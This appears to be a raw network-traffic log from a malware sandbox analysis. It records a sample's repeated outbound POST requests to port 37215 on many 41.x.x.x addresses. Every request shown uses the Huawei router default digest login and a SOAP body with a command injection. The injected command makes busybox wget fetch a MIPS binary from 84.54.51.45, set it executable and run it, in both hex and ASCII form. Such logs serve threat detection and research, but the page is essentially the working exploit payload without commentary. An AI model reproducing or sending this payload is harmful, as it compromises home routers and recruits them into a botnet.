6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            573192.168.2.155085841.144.242.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159399033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            574192.168.2.154761441.218.221.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159401894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            575192.168.2.155370841.161.40.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159401894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            576192.168.2.155489641.240.22.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159405947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            577192.168.2.155793041.220.7.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159414053 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            578192.168.2.154456641.113.243.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159441948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            579192.168.2.155129241.11.210.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159441948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            580192.168.2.154419841.6.6.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159473896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            581192.168.2.155100041.95.52.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159477949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            582192.168.2.154854441.67.158.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159524918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            583192.168.2.153941441.111.158.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159524918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
